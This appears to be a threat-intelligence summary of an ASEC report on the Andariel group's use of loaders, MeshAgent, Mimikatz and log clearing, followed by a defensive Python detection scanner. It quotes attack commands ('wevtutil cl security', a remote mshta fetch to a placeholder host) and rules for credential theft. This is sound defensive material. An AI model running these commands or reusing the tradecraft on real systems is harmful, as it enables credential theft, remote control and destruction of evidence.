Andariel Group Exploiting Korean Asset Management Solutions (MeshAgent) – ASEC BLOG

AhnLab ASEC observed the Andariel group exploiting Korean asset-management solutions to distribute loaders and remote-access tools—notably AndarLoader, ModeLoader, and MeshAgent—to perform lateral movement, in-memory execution, and remote control. These intrusions used Mshta-based JavaScript loading, in-memory .NET execution, credential theft with Mimikatz, event log clearing, and remote-control tools such as MeshAgent and RDP. #AndarLoader #MeshAgent

Keypoints

  • Andariel abused Korean asset management solutions to execute payloads during lateral movement and deploy loaders and remote-control tools.
  • AndarLoader acts as a downloader that pulls .NET assemblies and executes them in memory; it supports commands to run assemblies/methods, terminate, and self-delete.
  • AndarLoader samples in this campaign were obfuscated with KoiVM and use the “sslClient” string when communicating with C2 over HTTPS.
  • ModeLoader is a JavaScript loader delivered and executed via Mshta; it polls modeRead.php for Base64 commands and posts results to modeWrite.php.
  • MeshAgent (downloaded in one case as “fav.ico”) was used to provide remote desktop/control capabilities; an active MeshAgent C2 (84.38.129[.]21) was observed.
  • Post-compromise activity included installing Mimikatz for credential dumping (with UseLogonCredential registry modification), clearing security logs using wevtutil, and deploying a keylogger that stores data in C:\Users\Public\game.db.

MITRE Techniques

  • [T1218.005] Mshta – Used to download and execute ModeLoader via a remote Mshta invocation (‘downloaded externally via Mshta and executed’).
  • [T1105] Ingress Tool Transfer – Loaders download external executables and scripts (AndarLoader and ModeLoader) onto targets (‘downloads executable data such as .NET assembly and runs it in the memory’).
  • [T1620] Reflective Code Loading – AndarLoader runs downloaded .NET assemblies directly in memory rather than writing them to disk (‘downloads .NET assembly and runs it in the memory’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Attackers executed commands via cmd.exe for discovery and execution (‘cmd.exe /c tasklist’ and ‘cmd.exe /c c:\windows\system32\SVPN*’).
  • [T1027] Obfuscated Files or Information – AndarLoader samples were obfuscated using KoiVM to hide strings and behavior (‘obfuscated using KoiVM’).
  • [T1003] Credential Dumping – Threat actors installed and used Mimikatz to harvest credentials and manipulated UseLogonCredential to enable WDigest capture (‘installed Mimikatz and attempted to steal the credentials’ and ‘sets the UseLogonCredential registry key’).
  • [T1070.001] Clear Windows Event Logs – Attackers removed evidence by clearing the security event log with wevtutil (‘wevtutil cl security’).
  • [T1219] Remote Access Software – MeshAgent was deployed to provide remote desktop and management functionality abused by the attackers (‘MeshAgent…provides web-based remote desktop features such as RDP and VNC’).
  • [T1021.001] Remote Services: RDP – In some cases the actors enabled and used RDP to access infected hosts (‘they also used RDP … the command to activate the RDP service was also found’).
  • [T1056.001] Input Capture: Keylogging – A keylogger was present that captured keystrokes and clipboard data, storing entries in a local database (‘records the keylogged data and data copied to the clipboard in “C:\Users\Public\game.db”’).
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communication was observed over HTTPS and HTTP endpoints for AndarLoader and ModeLoader (‘privacy.hopto[.]org:443’ and ‘modeRead.php / modeWrite.php endpoints’).

Indicators of Compromise

  • [MD5] Malware file hashes – a714b928bbc7cd480fed85e379966f95 (AndarLoader SVPNClientW.exe), 4f1b1124e34894398aa423200a8ab894 (KeyLogger samples), and 2 more hashes.
  • [C2 Domains/URLs] Command-and-control endpoints – privacy.hopto[.]org:443 (AndarLoader), hxxp://www.ipservice.kro[.]kr/modeRead.php (ModeLoader), and several additional ModeLoader endpoints / view.php / modeWrite.php.
  • [IP Address] Remote management server – 84.38.129[.]21 observed as an active MeshAgent server.
  • [File names] Deployed filenames and paths – %SystemDirectory%\SVPNClientW.exe (AndarLoader install location), C:\Users\Public\game.db (keylogger storage), %USERPROFILE%\mimi.exe (Mimikatz), and other dropper names.

Attackers exploited legitimate Korean asset-management solutions to run scripted payloads and downloaders during lateral movement. They used Mshta to fetch and execute ModeLoader JavaScript, which routinely polls modeRead.php for Base64-encoded commands and posts results to modeWrite.php; ModeLoader was then used to fetch additional payloads, for example dropping AndarLoader as %SystemDirectory%\SVPNClientW.exe and executing it.

AndarLoader operates as an in-memory downloader: it retrieves .NET assemblies, decrypts strings at runtime (samples were obfuscated with KoiVM), and executes methods or assemblies directly in memory. Its command set includes running assemblies/methods, terminating, and self-deletion. C2 communications occurred over HTTPS, with identified endpoints for both AndarLoader and ModeLoader activity.

Post-compromise actions included deploying MeshAgent (observed downloaded as “fav.ico”) to enable remote desktop/control, enabling RDP (commands found to activate the service), running Mimikatz for credential dumping (with UseLogonCredential registry modification), clearing security logs via wevtutil cl security, and installing a keylogger that logs keystrokes and clipboard content to C:\Users\Public\game.db. The network and host artifacts and file hashes listed above serve as the primary IOCs for detection and containment.
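As an added defender-side example (not code from the ASEC report), the following Python scanner turns the behaviours described above into simple detection rules and runs them over constructed sample telemetry. The file names, endpoints and registry value are the ones the report names; the hostnames, user names and log format are placeholders, and the full WDigest key path is the standard Windows location, not something the report states.

```python
import re

# Detection rules built from the behaviours in this report. The regexes are constructed here;
# SVPNClientW.exe, fav.ico, game.db, mimi.exe, modeRead/modeWrite.php and UseLogonCredential
# come from the report. Each entry: (rule name, MITRE technique, pattern over one log line).
RULES = [
    ("mshta_remote_script", "T1218.005",
     re.compile(r"\bmshta(\.exe)?\b\s+\S*https?://", re.I)),
    ("modeloader_endpoint", "T1071.001",
     re.compile(r"/(modeRead|modeWrite)\.php\b", re.I)),
    ("andarloader_in_system32", "T1105",
     re.compile(r"\\system32\\SVPN(ClientW\.exe|\*)", re.I)),
    ("meshagent_as_fav_ico", "T1219",  # weak on its own; pivot, do not alert alone
     re.compile(r"\bfav\.ico\b", re.I)),
    ("wdigest_uselogoncredential_on", "T1003",
     re.compile(r"WDigest\\UseLogonCredential\b[^0-9]*(1|0x1)\b", re.I)),
    ("mimikatz_in_profile", "T1003",
     re.compile(r"%USERPROFILE%\\mimi\.exe|\\Users\\[^\\]+\\mimi\.exe", re.I)),
    ("wevtutil_clear_security", "T1070.001",
     re.compile(r"\bwevtutil(\.exe)?\s+cl\s+security\b", re.I)),
    ("keylogger_game_db", "T1056.001",
     re.compile(r"C:\\Users\\Public\\game\.db\b", re.I)),
]

# Constructed sample telemetry (process, network, registry and file events from one host).
SAMPLE_LOG = [
    r"ProcessCreate: mshta.exe http://example.invalid/view.php",
    r"NetConn: GET http://example.invalid/modeRead.php",
    r"ProcessCreate: cmd.exe /c c:\windows\system32\SVPN*",
    r"ProcessCreate: cmd.exe /c tasklist",
    r"NetConn: GET http://example.invalid/fav.ico",
    r"RegSet: HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = DWORD 1",
    r"ProcessCreate: C:\Users\alice\mimi.exe",
    r"ProcessCreate: wevtutil cl security",
    r"FileCreate: C:\Users\Public\game.db",
    r"ProcessCreate: notepad.exe C:\Users\alice\notes.txt",
]

def scan(log_lines):
    """Return (rule_name, technique, line) for every rule each line matches."""
    hits = []
    for line in log_lines:
        for name, technique, pattern in RULES:
            if pattern.search(line):
                hits.append((name, technique, line))
    return hits

def techniques_seen(log_lines):
    """Distinct techniques hit, sorted; several stages on one host is the strong signal."""
    return sorted({technique for _, technique, _ in scan(log_lines)})
```

Single rules such as the fav.ico name will false-positive on their own; the useful alert is a host that trips several stages of this chain within a short window.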

Read more: https://asec.ahnlab.com/en/63192/